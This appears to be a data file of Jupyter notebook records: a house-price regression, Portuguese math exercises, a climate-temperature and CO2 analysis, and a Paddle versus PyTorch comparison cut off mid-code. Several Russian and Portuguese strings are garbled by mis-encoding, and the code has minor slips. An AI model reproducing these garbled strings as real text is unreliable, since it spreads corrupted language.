bins = [0, 3, 5, 9, 15, train_df['Floor'].max()]
pd.cut(train_df['Floor'], bins=bins)
train_df = year_to_cat(train_df)
train_df = floor_to_cat(train_df)
train_df.head()
med_price_by_floor_year = train_df.groupby(['year_cat', 'floor_cat'], as_index=False).agg({'Price':'median'}).\
rename(columns={'Price':'MedPriceByFloorYear'})
med_price_by_floor_year.head()
train_df = train_df.merge(med_price_by_floor_year, on=['year_cat', 'floor_cat'], how='left')
train_df.head()
class FeatureGenetator():
"""ะะตะฝะตัะฐัะธั ะฝะพะฒัั
ัะธั"""
def __init__(self):
self.DistrictId_counts = None
self.binary_to_numbers = None
self.med_price_by_district = None
self.med_price_by_floor_year = None
self.house_year_max = None
self.floor_max = None
def fit(self, X, y=None):
X = X.copy()
# Binary features
self.binary_to_numbers = {'A': 0, 'B': 1}
# DistrictID
self.district_size = X['DistrictId'].value_counts().reset_index() \
.rename(columns={'index':'DistrictId', 'DistrictId':'DistrictSize'})
# Target encoding
## District, Rooms
df = X.copy()
if y is not None:
df['Price'] = y.values
self.med_price_by_district = df.groupby(['DistrictId', 'Rooms'], as_index=False).agg({'Price':'median'})\
.rename(columns={'Price':'MedPriceByDistrict'})
self.med_price_by_district_median = self.med_price_by_district['MedPriceByDistrict'].median()
## floor, year
if y is not None:
self.floor_max = df['Floor'].max()
self.house_year_max = df['HouseYear'].max()
df['Price'] = y.values
df = self.floor_to_cat(df)
df = self.year_to_cat(df)
self.med_price_by_floor_year = df.groupby(['year_cat', 'floor_cat'], as_index=False).agg({'Price':'median'}).\
rename(columns={'Price':'MedPriceByFloorYear'})
self.med_price_by_floor_year_median = self.med_price_by_floor_year['MedPriceByFloorYear'].median()
def transform(self, X):
# Binary features
X['Ecology_2'] = X['Ecology_2'].map(self.binary_to_numbers) # self.binary_to_numbers = {'A': 0, 'B': 1}
X['Ecology_3'] = X['Ecology_3'].map(self.binary_to_numbers)
X['Shops_2'] = X['Shops_2'].map(self.binary_to_numbers)
# DistrictId, IsDistrictLarge
X = X.merge(self.district_size, on='DistrictId', how='left')
X['new_district'] = 0
X.loc[X['DistrictSize'].isna(), 'new_district'] = 1
X['DistrictSize'].fillna(5, inplace=True)
X['IsDistrictLarge'] = (X['DistrictSize'] > 100).astype(int)
# More categorical features
X = self.floor_to_cat(X) # + ััะพะปะฑะตั floor_cat
X = self.year_to_cat(X) # + ััะพะปะฑะตั year_cat
# Target encoding
if self.med_price_by_district is not None:
X = X.merge(self.med_price_by_district, on=['DistrictId', 'Rooms'], how='left')
X.fillna(self.med_price_by_district_median, inplace=True)
if self.med_price_by_floor_year is not None:
X = X.merge(self.med_price_by_floor_year, on=['year_cat', 'floor_cat'], how='left')
X.fillna(self.med_price_by_floor_year_median, inplace=True)
return X
def floor_to_cat(self, X):
bins = [0, 3, 5, 9, 15, self.floor_max]
X['floor_cat'] = pd.cut(X['Floor'], bins=bins, labels=False)
X['floor_cat'].fillna(-1, inplace=True)
return X
def year_to_cat(self, X):
bins = [0, 1941, 1945, 1980, 2000, 2010, self.house_year_max]
X['year_cat'] = pd.cut(X['HouseYear'], bins=bins, labels=False)
X['year_cat'].fillna(-1, inplace=True)
return X
train_df.columns.tolist()
feature_names = ['Rooms', 'Square', 'LifeSquare', 'KitchenSquare', 'Floor', 'HouseFloor', 'HouseYear',
'Ecology_1', 'Ecology_2', 'Ecology_3', 'Social_1', 'Social_2', 'Social_3',
'Helthcare_2', 'Shops_1', 'Shops_2']
new_feature_names = ['Rooms_outlier', 'HouseFloor_outlier', 'HouseYear_outlier', 'LifeSquare_nan', 'DistrictSize',
'new_district', 'IsDistrictLarge', 'MedPriceByDistrict', 'MedPriceByFloorYear']
target_name = 'Price'
train_df = pd.read_csv(TRAIN_DATASET_PATH)
test_df = pd.read_csv(TEST_DATASET_PATH)
X = train_df.drop(columns=target_name)
y = train_df[target_name]
X_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.33, shuffle=True, random_state=21)
preprocessor = DataPreprocessing()
preprocessor.fit(X_train)
X_train = preprocessor.transform(X_train)
X_valid = preprocessor.transform(X_valid)
test_df = preprocessor.transform(test_df)
X_train.shape, X_valid.shape, test_df.shape
features_gen = FeatureGenetator()
features_gen.fit(X_train, y_train)
X_train = features_gen.transform(X_train)
X_valid = features_gen.transform(X_valid)
test_df = features_gen.transform(test_df)
X_train.shape, X_valid.shape, test_df.shape
X_train = X_train[feature_names + new_feature_names]
X_valid = X_valid[feature_names + new_feature_names]
test_df = test_df[feature_names + new_feature_names]
X_train.isna().sum().sum(), X_valid.isna().sum().sum(), test_df.isna().sum().sum()
import xgboost as xgb
from xgboost_autotune import fit_parameters
from sklearn.metrics import make_scorer, accuracy_score
best_xgb_model = xgb.XGBRegressor(colsample_bytree=0.4,
gamma=0,
learning_rate=0.08,
max_depth=8,
min_child_weight=1.5,
# 10000
n_estimators=300,
reg_alpha=0.75,
reg_lambda=0.45,
subsample=0.6,
seed=42)
best_xgb_model.fit(X_train,y_train)
y_train_preds = best_xgb_model.predict(X_train)
y_test_preds = best_xgb_model.predict(X_valid)
evaluate_preds(y_train, y_train_preds, y_valid, y_test_preds)
rf_model = RandomForestRegressor(random_state=21, criterion='mse')
rf_model.fit(X_train, y_train)
y_train_preds = rf_model.predict(X_train)
y_test_preds = rf_model.predict(X_valid)
evaluate_preds(y_train, y_train_preds, y_valid, y_test_preds)
cv_score = cross_val_score(rf_model, X_train, y_train, scoring='r2', cv=KFold(n_splits=3, shuffle=True, random_state=21))
cv_score
cv_score.mean()
feature_importances = pd.DataFrame(list(zip(X_train.columns, rf_model.feature_importances_)),
columns=['feature_name', 'importance'])
feature_importances.sort_values(by='importance', ascending=False)
from sklearn.ensemble import StackingRegressor, VotingRegressor, BaggingRegressor, GradientBoostingRegressor
from sklearn.linear_model import LinearRegression
lr = LinearRegression()
gb = GradientBoostingRegressor()
stack = StackingRegressor([('lr', lr), ('rf', rf_model)], final_estimator=gb)
stack.fit(X_train, y_train)
y_train_preds = stack.predict(X_train)
y_test_preds = stack.predict(X_valid)
evaluate_preds(y_train, y_train_preds, y_valid, y_test_preds)
test_df.shape
test_df
submit = pd.read_csv('sample_submission.csv')
submit.head()
best_xgb_model
# predictions = rf_model.predict(test_df)
predictions = best_xgb_model.predict(test_df)
predictions
submit['Price'] = predictions
submit.head()
submit.to_csv('rf_submit.csv', index=False)
| 0.403684 | 0.980949 |
# <font color='blue'>Data Science Academy</font>
# <font color='blue'>Matemรกtica Para Machine Learning</font>
## Exercise List - Chapter 2
The goal of this exercise list is for you to practice the main concepts studied in this chapter while developing your programming-logic skills with the Python language.
If you have questions, that is absolutely normal; do some research to refresh your memory of the form of the mathematical operations.
When you find the form of an operation that solves the proposed exercise, use the Python language to represent that operation. In essence, that is how we apply mathematics to machine learning: building algorithms and representing those algorithms in a programming language.
Have fun!!
## Solving Systems of Equations in Python
Using numpy, we can solve systems of equations in Python. Each equation in a system can be represented with matrices. For example, the equation 3x - 9y = -42 can be represented as [3, -9] and [-42]. If we add another equation, for example 2x + 4y = 2, we can combine it with the previous one to get [[3, -9], [2, 4]] and [-42, 2]. Now let's solve for the x and y values.
First, we put these equations into numpy arrays:
```
import numpy as np
A = np.array([ [3,-9], [2,4] ])
b = np.array([-42,2])
```
Then we use the linalg.solve() function to solve for the x and y values, like this:
```
x, y = np.linalg.solve(A,b)
print("Os valores de x e y nas equaรงรตes acima sรฃo, respectivamente:", x, y)
```
### Exercise 1 - Solve the system of equations:
# 1x + 1y = 35
# 2x + 4y = 94
```
# Soluรงรฃo
Mat1 = np.array([[1,1],[2,4]])
Mat2 = np.array([35,94])
x , y = np.linalg.solve(Mat1,Mat2)
print("Os valores de x e y nas equaรงรตes acima sรฃo, respectivamente:", x, y)
```
### Exercise 2 - Solve the quadratic equation ax**2 + bx + c = 0 using the mathematical formula
Hint 1: Ask the user to enter the values of the 3 coefficients of the equation (a, b and c) and solve for the values of x.
Hint 2: Use the sqrt() function from the math package
Hint 3: Pay attention to the possible outcomes of the equation:
- If d < 0: no solution in the reals
- If d = 0: the equation has exactly one real solution, x = -b/(2a)
- If d > 0: the equation has two solutions, x1 and x2
```
# Soluรงรฃo
from math import sqrt
a = float(input('digite o valor de a'))
b = float(input('digite o valor de b'))
c = float(input('digite o valor de c'))
delta = b**2-4*a*c
if delta < 0:
print('nรฃo existe soluรงรฃo real para a equaรงรฃo')
elif delta == 0:
x1 = -b / (2*a)
print('A raiz da equação é:', x1)
else:
x1 = (-b + sqrt(delta)) / (2*a)
x2 = (-b - sqrt(delta)) / (2*a)
print('as raizes sรฃo: ',x1 , x2)
```
### Exercise 3 - Solve the quadratic equation ax**2 + bx + c = 0 by creating a Python function that receives the 3 coefficients as parameters
```
# Soluรงรฃo
```
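One possible solution sketch for Exercise 3 (not the official course solution); it reuses the discriminant logic from Exercise 2 and the function name is only illustrative:
```
from math import sqrt

def resolver_quadratica(a, b, c):
    # Returns the real roots of ax**2 + bx + c = 0, or None if there are none
    delta = b**2 - 4*a*c
    if delta < 0:
        return None
    if delta == 0:
        return (-b / (2*a),)
    return ((-b + sqrt(delta)) / (2*a), (-b - sqrt(delta)) / (2*a))

print(resolver_quadratica(1, -5, 6))   # (3.0, 2.0)
```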
### Exercise 4 - Study the mathematical functions in Python at the link:
https://docs.python.org/3.6/library/math.html
### Exercise 5 - Create a Python class that computes the square of a number
Hint: To test it, instantiate the class into an object, passing the number as a parameter
```
# Soluรงรฃo
```
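One possible sketch for Exercise 5; the class and attribute names are illustrative only:
```
class Quadrado:
    # Computes the square of the number passed at construction time
    def __init__(self, numero):
        self.numero = numero

    def calcular(self):
        return self.numero ** 2

q = Quadrado(7)
print(q.calcular())   # 49
```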
### Exercise 6 - Create a Python function to solve the quadratic equation ax**2 + bx + c = 0, applying error handling
```
# Soluรงรฃo
```
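One possible sketch for Exercise 6, wrapping the same formula in basic error handling; the function name and messages are illustrative:
```
from math import sqrt

def resolver_com_tratamento(a, b, c):
    try:
        a, b, c = float(a), float(b), float(c)
        if a == 0:
            raise ValueError("'a' must be non-zero for a quadratic equation")
        delta = b**2 - 4*a*c
        if delta < 0:
            return None
        return ((-b + sqrt(delta)) / (2*a), (-b - sqrt(delta)) / (2*a))
    except (TypeError, ValueError) as erro:
        print("Invalid input:", erro)
        return None

print(resolver_com_tratamento(1, 2, 1))    # (-1.0, -1.0)
print(resolver_com_tratamento("x", 2, 1))  # prints "Invalid input: ..." and returns None
```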
### Exercise 7 - Create a plot with the line that represents the linear function
Hint 1: Linear function y = mx + b / y = ax + b
```
# Soluรงรฃo
```
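One possible sketch for Exercise 7, with an arbitrary slope and intercept chosen only for illustration:
```
import numpy as np
import matplotlib.pyplot as plt

m, b = 2, 1                       # arbitrary slope and intercept
x = np.linspace(-10, 10, 100)
y = m * x + b

plt.plot(x, y)
plt.title('Linear function y = 2x + 1')
plt.xlabel('x')
plt.ylabel('y')
plt.grid(True)
plt.show()
```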
### Exercise 8 - Create a plot with the parabola that represents the quadratic function
```
# Soluรงรฃo
```
## Challenge - Questions 9 and 10
### Exercise 9 - Create a function that computes the slope and the intercept (the m and b coefficients) of the linear function studied in the previous lessons, then compute and draw the line that represents the function
Hint 1: Use dummy data for x and y
Hint 2: The formula of the linear function is y = mx + b
```
# Soluรงรฃo
# Calcula a linha usando list comprehension
# Plot
```
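One possible sketch for Exercise 9, estimating m and b by least squares on dummy data (the data values are made up for illustration):
```
import numpy as np
import matplotlib.pyplot as plt

def coeficientes(x, y):
    # least-squares slope and intercept
    m = ((x - x.mean()) * (y - y.mean())).sum() / ((x - x.mean()) ** 2).sum()
    b = y.mean() - m * x.mean()
    return m, b

x = np.array([1, 2, 3, 4, 5], dtype=float)
y = np.array([2.1, 3.9, 6.2, 8.1, 9.8])
m, b = coeficientes(x, y)

linha = [m * xi + b for xi in x]      # the line, via list comprehension
plt.scatter(x, y)
plt.plot(x, linha, color='red')
plt.show()
```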
### Exercise 10 - Define a new value of x and find the corresponding y
```
# Soluรงรฃo
# Novo valor de x
# Prevendo o valor de y
# Plot
```
## End
|
github_jupyter
|
import numpy as np
A = np.array([ [3,-9], [2,4] ])
b = np.array([-42,2])
x, y = np.linalg.solve(A,b)
print("Os valores de x e y nas equaรงรตes acima sรฃo, respectivamente:", x, y)
# Soluรงรฃo
Mat1 = np.array([[1,1],[2,4]])
Mat2 = np.array([35,94])
x , y = np.linalg.solve(Mat1,Mat2)
print("Os valores de x e y nas equaรงรตes acima sรฃo, respectivamente:", x, y)
# Soluรงรฃo
from math import sqrt
a = float(input('digite o valor de a'))
b = float(input('digite o valor de b'))
c = float(input('digite o valor de c'))
delta = b**2-4*a*c
if delta < 0:
print('nรฃo existe soluรงรฃo real para a equaรงรฃo')
elif delta == 0:
x1 = -b / (2*a)
print('A raiz da equação é:', x1)
else:
x1 = (-b + sqrt(delta)) / (2*a)
x2 = (-b - sqrt(delta)) / (2*a)
print('as raizes sรฃo: ',x1 , x2)
# Soluรงรฃo
# Soluรงรฃo
# Soluรงรฃo
# Soluรงรฃo
# Soluรงรฃo
# Soluรงรฃo
# Calcula a linha usando list comprehension
# Plot
# Soluรงรฃo
# Novo valor de x
# Prevendo o valor de y
# Plot
| 0.214856 | 0.991032 |
# Climate Change and CO2 levels in atmosphere
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
data_country = pd.read_csv("../TERN/Data Analysis/Climate Change/Climate Change Earth Surface Temperature Data/GlobalLandTemperaturesByCountry.csv")
data_india = data_country[data_country["Country"] == "India"].copy()
data_india["dt"] = pd.to_datetime(data_india["dt"])
data_global = pd.read_csv("../TERN/Data Analysis/Climate Change/Climate Change Earth Surface Temperature Data/GlobalTemperatures.csv")
data_global["dt"] = pd.to_datetime(data_global["dt"])
data_global.head()
data_global.info()
data_global.describe()
plt.figure(figsize = (20, 6))
annual_mean_global = data_global.groupby(data_global["dt"].dt.year).mean()
sns.set_context("poster", font_scale=0.8)
annual_mean_global.loc[1960:2013]["LandAndOceanAverageTemperature"].plot(grid=True)
plt.legend()
plt.title("Annual Global Land and Ocean Average Temperature")
plt.xlabel('Years')
plt.ylabel("Average Temperature")
plt.show()
data_india.head()
data_india.info()
data_india.describe()
plt.figure(figsize = (20, 6))
sns.set_context("poster", font_scale=0.8)
annual_mean_india = data_india.groupby(data_india["dt"].dt.year).mean()
annual_mean_india.loc[1960:2013]["AverageTemperature"].plot(grid=True)
plt.legend()
plt.title("Annual India Land and Ocean Average Temperature")
plt.xlabel('Years')
plt.ylabel("Average Temperature")
plt.show()
annual_mean_global = data_global.groupby(data_global["dt"].dt.year).mean()
reference_temperature_global = annual_mean_global.loc[1951:1980].mean()["LandAndOceanAverageTemperature"]
annual_mean_global["Temperature Anomaly"] = annual_mean_global["LandAndOceanAverageTemperature"] - reference_temperature_global
annual_mean_india = data_india.groupby(data_india["dt"].dt.year).mean()
reference_temperature_india = annual_mean_india.loc[1951:1980].mean()["AverageTemperature"]
annual_mean_india["Temperature Anomaly"] = annual_mean_india["AverageTemperature"] - reference_temperature_india
```
The mean temperature over the 1951-1980 period is used as the global baseline. In climate change studies, temperature anomalies are more informative than absolute temperatures. A temperature anomaly is the difference from an average, or baseline, temperature, where the baseline is typically computed by averaging 30 or more years of temperature data. A positive anomaly indicates the observed temperature was warmer than the baseline, while a negative anomaly indicates it was cooler. This is standard practice in climate science. The deviation from this baseline is stored in the Temperature Anomaly column.
Resource: https://www.ncdc.noaa.gov/monitoring-references/dyk/anomalies-vs-temperature
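In formula form, the anomaly computed in the next cell is simply the difference from the 1951-1980 baseline mean:

$$\text{anomaly}_t = T_t - \frac{1}{30}\sum_{y=1951}^{1980} T_y$$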
```
plt.figure(figsize = (20, 6))
annual_mean_global.loc[1960:2013]["Temperature Anomaly"].plot(grid=True)
sns.set_context("poster", font_scale=0.8)
plt.title("Annual Global anomaly from base mean temperature")
plt.xlabel('Years')
plt.ylabel('Temperature Anomaly')
plt.legend()
plt.show()
```
The global temperature anomaly rises to roughly 0.75 degrees Celsius by the end of the plotted period, the highest value in the dataset.
```
plt.figure(figsize = (20, 6))
annual_mean_india.loc[1960:2015]["Temperature Anomaly"].plot(grid=True)
sns.set_context("poster", font_scale=0.8)
plt.title("Annual anomaly from base mean temperature in India")
plt.xlabel('Years')
plt.ylabel('Temperature Anomaly')
plt.legend(loc = "upper left")
plt.show()
```
The temperature has also steadily increased in India.
```
plt.figure(figsize = (20, 6))
annual_mean_global.loc[1960:2015]["Temperature Anomaly"].plot(grid=True, label = "World")
annual_mean_india.loc[1960:2015]["Temperature Anomaly"].plot(grid=True, label = "India")
sns.set_context("poster", font_scale=0.8)
plt.title("Comparison of annual anomaly from base mean temperature in India and World")
plt.xlabel('Years')
plt.ylabel('Temperature Anomaly')
plt.legend()
plt.show()
```
# Climate Change and CO2 levels
```
co2_ppm = pd.read_csv("C:/Users/Nihal Reddy/Desktop/FILES/TERN/Data Analysis/Climate Change/Carbon Dioxide Levels in Atmosphere/archive.csv")
co2_ppm.head()
plt.figure(figsize = (15, 8))
sns.set_context("poster", font_scale=0.8)
annual_co2_ppm = co2_ppm.groupby(co2_ppm["Year"]).mean()
annual_co2_ppm.loc[1960:2017]["Carbon Dioxide (ppm)"].plot(grid=True, legend=True)
plt.title("Global CO2 levels in Atmosphere")
plt.ylabel("CO2 parts per million")
plt.show()
```
Atmospheric CO2 levels rose steadily over the 1960-2017 period, mirroring the upward trend in global temperature shown above; the next cells quantify how closely the two track each other.
```
annual_co2_temp = pd.merge(annual_mean_global.loc[1960:2015], annual_co2_ppm.loc[1960:2015], left_index=True, right_index=True)
annual_co2_temp = annual_co2_temp[["LandAndOceanAverageTemperature", "Temperature Anomaly", "Carbon Dioxide (ppm)"]].copy()
annual_co2_temp.corr()
```
The correlation coefficient between CO2 concentration and the temperature anomaly is 0.92, indicating a strong linear association between the two variables.
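For reference, the value reported by .corr() above is the Pearson correlation coefficient:

$$r = \frac{\sum_i (x_i - \bar{x})(y_i - \bar{y})}{\sqrt{\sum_i (x_i - \bar{x})^2}\,\sqrt{\sum_i (y_i - \bar{y})^2}}$$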
```
plt.figure(figsize=(15, 10))
sns.set_context("poster", font_scale=0.8)
sns.scatterplot(x="Temperature Anomaly",y="Carbon Dioxide (ppm)", data=annual_co2_temp)
```
This scatter plot visualizes the linear relation between CO2 levels and the temperature anomaly: as CO2 concentrations in the atmosphere rise, the global mean temperature anomaly rises with them.
|
github_jupyter
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
data_country = pd.read_csv("../TERN/Data Analysis/Climate Change/Climate Change Earth Surface Temperature Data/GlobalLandTemperaturesByCountry.csv")
data_india = data_country[data_country["Country"] == "India"].copy()
data_india["dt"] = pd.to_datetime(data_india["dt"])
data_global = pd.read_csv("../TERN/Data Analysis/Climate Change/Climate Change Earth Surface Temperature Data/GlobalTemperatures.csv")
data_global["dt"] = pd.to_datetime(data_global["dt"])
data_global.head()
data_global.info()
data_global.describe()
plt.figure(figsize = (20, 6))
annual_mean_global = data_global.groupby(data_global["dt"].dt.year).mean()
sns.set_context("poster", font_scale=0.8)
annual_mean_global.loc[1960:2013]["LandAndOceanAverageTemperature"].plot(grid=True)
plt.legend()
plt.title("Annual Global Land and Ocean Average Temperature")
plt.xlabel('Years')
plt.ylabel("Average Temperature")
plt.show()
data_india.head()
data_india.info()
data_india.describe()
plt.figure(figsize = (20, 6))
sns.set_context("poster", font_scale=0.8)
annual_mean_india = data_india.groupby(data_india["dt"].dt.year).mean()
annual_mean_india.loc[1960:2013]["AverageTemperature"].plot(grid=True)
plt.legend()
plt.title("Annual India Land and Ocean Average Temperature")
plt.xlabel('Years')
plt.ylabel("Average Temperature")
plt.show()
annual_mean_global = data_global.groupby(data_global["dt"].dt.year).mean()
reference_temperature_global = annual_mean_global.loc[1951:1980].mean()["LandAndOceanAverageTemperature"]
annual_mean_global["Temperature Anomaly"] = annual_mean_global["LandAndOceanAverageTemperature"] - reference_temperature_global
annual_mean_india = data_india.groupby(data_india["dt"].dt.year).mean()
reference_temperature_india = annual_mean_india.loc[1951:1980].mean()["AverageTemperature"]
annual_mean_india["Temperature Anomaly"] = annual_mean_india["AverageTemperature"] - reference_temperature_india
plt.figure(figsize = (20, 6))
annual_mean_global.loc[1960:2013]["Temperature Anomaly"].plot(grid=True)
sns.set_context("poster", font_scale=0.8)
plt.title("Annual Global anomaly from base mean temperature")
plt.xlabel('Years')
plt.ylabel('Temperature Anomaly')
plt.legend()
plt.show()
plt.figure(figsize = (20, 6))
annual_mean_india.loc[1960:2015]["Temperature Anomaly"].plot(grid=True)
sns.set_context("poster", font_scale=0.8)
plt.title("Annual anomaly from base mean temperature in India")
plt.xlabel('Years')
plt.ylabel('Temperature Anomaly')
plt.legend(loc = "upper left")
plt.show()
plt.figure(figsize = (20, 6))
annual_mean_global.loc[1960:2015]["Temperature Anomaly"].plot(grid=True, label = "World")
annual_mean_india.loc[1960:2015]["Temperature Anomaly"].plot(grid=True, label = "India")
sns.set_context("poster", font_scale=0.8)
plt.title("Comparison of annual anomaly from base mean temperature in India and World")
plt.xlabel('Years')
plt.ylabel('Temperature Anomaly')
plt.legend()
plt.show()
co2_ppm = pd.read_csv("C:/Users/Nihal Reddy/Desktop/FILES/TERN/Data Analysis/Climate Change/Carbon Dioxide Levels in Atmosphere/archive.csv")
co2_ppm.head()
plt.figure(figsize = (15, 8))
sns.set_context("poster", font_scale=0.8)
annual_co2_ppm = co2_ppm.groupby(co2_ppm["Year"]).mean()
annual_co2_ppm.loc[1960:2017]["Carbon Dioxide (ppm)"].plot(grid=True, legend=True)
plt.title("Global CO2 levels in Atmosphere")
plt.ylabel("CO2 parts per million")
plt.show()
annual_co2_temp = pd.merge(annual_mean_global.loc[1960:2015], annual_co2_ppm.loc[1960:2015], left_index=True, right_index=True)
annual_co2_temp = annual_co2_temp[["LandAndOceanAverageTemperature", "Temperature Anomaly", "Carbon Dioxide (ppm)"]].copy()
annual_co2_temp.corr()
plt.figure(figsize=(15, 10))
sns.set_context("poster", font_scale=0.8)
sns.scatterplot(x="Temperature Anomaly",y="Carbon Dioxide (ppm)", data=annual_co2_temp)
| 0.446253 | 0.864939 |
```
import os
import sys
import cv2
import numpy as np
import torch
import torchvision
import paddle
import matplotlib.pyplot as plt
%matplotlib inline
print(paddle.__version__)
print(torch.__version__)
conv_paddle = paddle.nn.Conv2D(
in_channels=3,
out_channels=4,
kernel_size=1,
stride=1)
conv_torch = torch.nn.Conv2d(
    in_channels=3,
    out_channels=4,
    kernel_size=1,
    stride=1)
print(conv_paddle)
print(conv_torch)
linear_paddle = paddle.nn.Linear(
in_features=10,
out_features=20)
linear_torch = torch.nn.Linear(
in_features=10,
out_features=20)
print(linear_paddle)
print(linear_torch)
print("====linear_paddle info====")
for name, weight in linear_paddle.named_parameters():
print(name, weight.shape)
print("\n====linear_torch info====")
for name, weight in linear_torch.named_parameters():
print(name, weight.shape)
# Download to the default path
dataset_paddle = paddle.vision.datasets.Cifar10(
mode="train",
download=True)
# Download to the ./data directory
dataset_torch = torchvision.datasets.CIFAR10(
root="./data",
train=True,
download=True)
print(dataset_paddle)
print(dataset_torch)
print("paddle length: ", len(dataset_paddle))
print("torch length: ", len(dataset_torch))
plt.subplot(121)
plt.imshow(dataset_paddle[0][0])
plt.subplot(122)
plt.imshow(dataset_paddle[1][0])
plt.show()
x = np.random.rand(32, 10).astype(np.float32)
label = np.random.randint(0, 10, [32, ], dtype=np.int64)
ce_loss_paddle = paddle.nn.CrossEntropyLoss()
ce_loss_torch = torch.nn.CrossEntropyLoss()
loss_paddle = ce_loss_paddle(
paddle.to_tensor(x),
paddle.to_tensor(label))
loss_torch = ce_loss_torch(
torch.from_numpy(x),
torch.from_numpy(label))
print(loss_paddle)
print(loss_torch)
x = np.random.rand(4, 10).astype(np.float32)
label = np.random.randint(0, 10, [4, ], dtype=np.int64)
score_paddle, cls_id_paddle = paddle.topk(paddle.to_tensor(x), k=1)
score_torch, cls_id_torch = torch.topk(torch.from_numpy(x), k=1)
print("====class ids diff=====")
print(cls_id_paddle.numpy().tolist())
print(cls_id_torch.numpy().tolist())
print("\n====socres diff=====")
print(score_paddle.numpy().tolist())
print(score_torch.numpy().tolist())
linear_paddle = paddle.nn.Linear(10, 10)
lr_sch_paddle = paddle.optimizer.lr.StepDecay(
0.1,
step_size=1,
gamma=0.1)
opt_paddle = paddle.optimizer.Momentum(
learning_rate=lr_sch_paddle,
parameters=linear_paddle.parameters(),
weight_decay=0.01)
linear_torch = torch.nn.Linear(10, 10)
opt_torch = torch.optim.SGD(
linear_torch.parameters(),
lr=0.1,
momentum=0.9,
weight_decay=0.1)
lr_sch_torch = torch.optim.lr_scheduler.StepLR(
opt_torch,
step_size=1, gamma=0.1)
for idx in range(1, 4):
lr_sch_paddle.step()
lr_sch_torch.step()
print("step {}, paddle lr: {:.6f}, torch lr: {:.6f}".format(
idx,
lr_sch_paddle.get_lr(),
lr_sch_torch.get_lr()[0]))
class PaddleModel(paddle.nn.Layer):
def __init__(self):
super().__init__()
self.conv = paddle.nn.Conv2D(
in_channels=3,
out_channels=12,
kernel_size=3,
padding=1,
            dilation=1)
self.bn = paddle.nn.BatchNorm2D(12)
self.relu = paddle.nn.ReLU()
self.maxpool = paddle.nn.MaxPool2D(
kernel_size=3,
stride=2,
padding=1)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
x = self.maxpool(x)
return x
class TorchModel(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv = torch.nn.Conv2d(
in_channels=3,
out_channels=12,
kernel_size=3,
padding=1)
self.bn = torch.nn.BatchNorm2d(12)
self.relu = torch.nn.ReLU()
self.maxpool = torch.nn.MaxPool2d(
kernel_size=3,
stride=2,
padding=1)
def forward(self, x):
        x = self.conv(x)
        x = self.bn(x)
x = self.relu(x)
x = self.maxpool(x)
return x
paddle_model = PaddleModel()
torch_model = TorchModel()
print(paddle_model)
print(torch_model)
print("====paddle names====")
print(list(paddle_model.state_dict().keys()))
print("\n====torch names====")
print(list(torch_model.state_dict().keys()))
def clip_funny(x, minv, maxv):
midv = (minv + maxv) / 2.0
cond1 = paddle.logical_and(x > minv, x < midv)
cond2 = paddle.logical_and(x >= midv, x < maxv)
y = paddle.where(cond1, paddle.ones_like(x) * minv, x)
y = paddle.where(cond2, paddle.ones_like(x) * maxv, y)
return y
x = paddle.to_tensor([1, 2, 2.5, 2.6, 3, 3.5])
y = clip_funny(x, 2, 3)
print(y)
```
|
github_jupyter
|
import os
import sys
import cv2
import numpy as np
import torch
import torchvision
import paddle
import matplotlib.pyplot as plt
%matplotlib inline
print(paddle.__version__)
print(torch.__version__)
conv_paddle = paddle.nn.Conv2D(
in_channels=3,
out_channels=4,
kernel_size=1,
stride=1)
conv_torch = torch.nn.Conv2d(
    in_channels=3,
    out_channels=4,
    kernel_size=1,
    stride=1)
print(conv_paddle)
print(conv_torch)
linear_paddle = paddle.nn.Linear(
in_features=10,
out_features=20)
linear_torch = torch.nn.Linear(
in_features=10,
out_features=20)
print(linear_paddle)
print(linear_torch)
print("====linear_paddle info====")
for name, weight in linear_paddle.named_parameters():
print(name, weight.shape)
print("\n====linear_torch info====")
for name, weight in linear_torch.named_parameters():
print(name, weight.shape)
# Download to the default path
dataset_paddle = paddle.vision.datasets.Cifar10(
mode="train",
download=True)
# Download to the ./data directory
dataset_torch = torchvision.datasets.CIFAR10(
root="./data",
train=True,
download=True)
print(dataset_paddle)
print(dataset_torch)
print("paddle length: ", len(dataset_paddle))
print("torch length: ", len(dataset_torch))
plt.subplot(121)
plt.imshow(dataset_paddle[0][0])
plt.subplot(122)
plt.imshow(dataset_paddle[1][0])
plt.show()
x = np.random.rand(32, 10).astype(np.float32)
label = np.random.randint(0, 10, [32, ], dtype=np.int64)
ce_loss_paddle = paddle.nn.CrossEntropyLoss()
ce_loss_torch = torch.nn.CrossEntropyLoss()
loss_paddle = ce_loss_paddle(
paddle.to_tensor(x),
paddle.to_tensor(label))
loss_torch = ce_loss_torch(
torch.from_numpy(x),
torch.from_numpy(label))
print(loss_paddle)
print(loss_torch)
x = np.random.rand(4, 10).astype(np.float32)
label = np.random.randint(0, 10, [4, ], dtype=np.int64)
score_paddle, cls_id_paddle = paddle.topk(paddle.to_tensor(x), k=1)
score_torch, cls_id_torch = torch.topk(torch.from_numpy(x), k=1)
print("====class ids diff=====")
print(cls_id_paddle.numpy().tolist())
print(cls_id_torch.numpy().tolist())
print("\n====socres diff=====")
print(score_paddle.numpy().tolist())
print(score_torch.numpy().tolist())
linear_paddle = paddle.nn.Linear(10, 10)
lr_sch_paddle = paddle.optimizer.lr.StepDecay(
0.1,
step_size=1,
gamma=0.1)
opt_paddle = paddle.optimizer.Momentum(
learning_rate=lr_sch_paddle,
parameters=linear_paddle.parameters(),
weight_decay=0.01)
linear_torch = torch.nn.Linear(10, 10)
opt_torch = torch.optim.SGD(
linear_torch.parameters(),
lr=0.1,
momentum=0.9,
weight_decay=0.1)
lr_sch_torch = torch.optim.lr_scheduler.StepLR(
opt_torch,
step_size=1, gamma=0.1)
for idx in range(1, 4):
lr_sch_paddle.step()
lr_sch_torch.step()
print("step {}, paddle lr: {:.6f}, torch lr: {:.6f}".format(
idx,
lr_sch_paddle.get_lr(),
lr_sch_torch.get_lr()[0]))
class PaddleModel(paddle.nn.Layer):
def __init__(self):
super().__init__()
self.conv = paddle.nn.Conv2D(
in_channels=3,
out_channels=12,
kernel_size=3,
padding=1,
            dilation=1)
self.bn = paddle.nn.BatchNorm2D(12)
self.relu = paddle.nn.ReLU()
self.maxpool = paddle.nn.MaxPool2D(
kernel_size=3,
stride=2,
padding=1)
def forward(self, x):
